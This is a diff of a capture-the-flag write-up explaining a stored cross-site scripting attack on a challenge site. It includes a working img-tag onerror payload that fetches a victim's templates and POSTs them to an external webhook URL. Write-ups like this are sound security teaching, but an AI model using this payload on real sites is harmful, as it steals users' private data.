rskbansal/cruXipher/Taking the X out of Twitter/README.md

 Rooner has hidden the flag in his templates, so we launch a cross-site scripting attack to make him access `/api/template/all` and send the acquired data to us.

-We create our own exploit template, let's call it exploit:
+We create our own exploit template, let's call it `exploit`:
 ```js
 <img src="/" onerror="fetch('/api/template/all/').then((res) => res.json()).then((res) => fetch('https://webhook.site/3dd2d66b-7ae2-4ef6-8c19-662382617a61', {method: 'POST', body: JSON.stringify(res)}))" );="" "="">
 ```

-We post this exploit using [[exploit]], and now whenever Rooner visits his feed, this sends a json record of Rooner's templates to the webhook created by us, where we find the flag.
+We post this exploit using `[[exploit]]`, and now whenever Rooner visits his feed, this sends a json record of Rooner's templates to the webhook created by us, where we find the flag.

 ## Flag